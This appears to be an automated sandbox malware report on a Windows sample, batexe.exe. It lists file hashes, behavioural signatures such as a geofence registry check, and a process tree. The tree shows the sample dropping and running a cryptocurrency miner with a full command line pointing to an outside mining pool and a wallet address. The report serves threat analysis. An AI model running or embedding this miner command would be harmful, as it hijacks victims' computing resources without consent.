Analysis
-
max time kernel
292s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
17/02/2024, 13:27
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4232 b2e.exe 3864 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3864 cpuminer-sse2.exe 3864 cpuminer-sse2.exe 3864 cpuminer-sse2.exe 3864 cpuminer-sse2.exe 3864 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/2324-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2324 wrote to memory of 4232 2324 batexe.exe 85 PID 2324 wrote to memory of 4232 2324 batexe.exe 85 PID 2324 wrote to memory of 4232 2324 batexe.exe 85 PID 4232 wrote to memory of 1140 4232 b2e.exe 86 PID 4232 wrote to memory of 1140 4232 b2e.exe 86 PID 4232 wrote to memory of 1140 4232 b2e.exe 86 PID 1140 wrote to memory of 3864 1140 cmd.exe 89 PID 1140 wrote to memory of 3864 1140 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\69D1.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\69D1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\69D1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7990.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3864
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.1MB
MD50bb027e79fd3a3a15231fc456af0996d
SHA176bbfdeb6472a8dd30c672043c58a4c9c74062fd
SHA256ab1029dc04f8c8125f4fe23a1a12ee4ea0812d4ceb2aebab13907ffc2791e693
SHA5121409bea5af0220f3462be616afe8dd5849e945fedcbeb738d70e60820ac04f9df1215717d65bd84c3beeeb560447eefdd43743e1792e6709d726d645979146b6
-
Filesize
1.1MB
MD5a43a8e689cd5eb2690d211c1d48e729a
SHA192acd696234142bf22c8b5f1c1af459f38dc3bf4
SHA256de564130f2706db8cccf91eb5cda9c55b9cb1cf5c775c3eee2d27c4c63ae5adc
SHA512d804a9846c745cebd70e25fc740f2d8ab555e3b66ec9a1199539d08a0bf9c7cc4d2122eb5fb65ad6192835649fc0cc55f08ea2572c131c6b1931be3d30991182
-
Filesize
3.0MB
MD542e52d2aa6e0aa4e0a6cb435f3e72e32
SHA1904d518be9644114eda76add80ccf585ee238731
SHA2564f8c614822cb12e7405d484d8ef1c5796fe1002f4e20867e761623d6108bd5ed
SHA512c5bdbe9278322b817f6744ed51e93d2a5a32b7285a5d8506bd7d6578fd432f43caec54c5ae81074a06b8c2b4a36ad5ee4bb6e817698252ec8df1406ee68916e4
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.2MB
MD57de42292360de1e074e874c8604d7c62
SHA12c631e8d81d2688897241b026d8524db58c0d2cf
SHA2560537a1d0c3e19b704ac2a4e88bd3784d49ea0996eafa0eea31af6ddba9fd7e7d
SHA5121363f7264b2aeb0d93803daac616d8cdc75071e4f392db927c0f7c2ce2936c7c8ce783f5e0601f5f8f088029977768b2f0fd83b292016210a0cb66614a785eed
-
Filesize
1.5MB
MD54ff74831f154773ce0f6437abfd0ba4f
SHA1b9ac1e63975ff7494e0f0ffb5146be8ed86d6e2c
SHA256df9b335bb9a475519b633674179aa216bf844b371df7b3c5823bae50d892e7ec
SHA512b972dda46990ebe84c68988a927ce74d57c0d75ba297d5ef1f938cd10eb8135a74e0dd5f97e0eea7a8301e6376ca90cab6782a8c8f3c7ef4abfef1eb3a08a524
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1003KB
MD51912eb48eb33112fb73f696e2fa9c1d9
SHA1183f02c97a2a7ed91f875d98b05f9ea911a26ff1
SHA256397e5aaedf6c4ef72a4354670c75b42a01140e1b9810e297ffe2269418ab5c5c
SHA51285fbc01cb32076db39cedc95e4f6e9d8f12122ce6e8d1970eba9486eaaa4baf2a26d6794b4cd0bf02d868a1e34a6a0ec4d7e34a8a42b32282fe66675753122a1
-
Filesize
1.1MB
MD50883c9c7acb4362fcfff7ce50495fcfb
SHA15b3a449588ac74e85bf58791aeafaba19a5ef4d7
SHA2560750b73984e0a41f4abe594a070a7ac15f3302143737a44e8da41607574d37cb
SHA5126f0069d839091735c53c8a79e72994489df0e3706d579125238d00d9865e64e703ae1084addcc8da860152659fca90c573f2792f97e65acb9b610b5c715f4c3e
-
Filesize
1.2MB
MD5b669ee4cb95666741e52f28a2e5782ae
SHA1e21b85e997db840c1fec40adc7ea4c5ddef0edae
SHA256a5f265e95d4a85be9110c5f328eeb7bc8ffffe4ed91fc192b7a85e620f9a74e9
SHA5128779bb3d01c07a33c8e56acc540d96e0e0402d2c79bcc74b3363ef1936279b897412ab6c3ce7914f7e8c5258283b3a4b0a79e40864df5a2f700542723c56eb90
-
Filesize
490KB
MD5f19821fc8775ce430f58219f880e11bc
SHA1128cefa44c3f9b19f4986281f1ab126648e72308
SHA2562c652b4d9d9b3c2fe4764b3af7ba89ad459c0c65625f7603dfb036e8a74c662d
SHA512617da8a0997b851676f1ea5dce3ea60de0822edb62bdb7600f11f844e393b1cbd7216747c5d678a2251906a9e69ebac83963d7092010db7d93da12dadb6a5631
-
Filesize
309KB
MD54ae72f0d39a4725e77df02253905262d
SHA1f9f0e538bf638d4e747583a1b6f2b9282511ba02
SHA25688c7e733cb8187871035a5c0ea6cfd660e5a0c1f0766478d5728da4c2b2e2faa
SHA5127f3a671bb7657837db8fc22da4bb2c106a7ee9a9c9fd5de14d5591e72303167497f495aa6133d5a11415e94806d4d5e0818177fc094ec5865dcd73704779e917
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770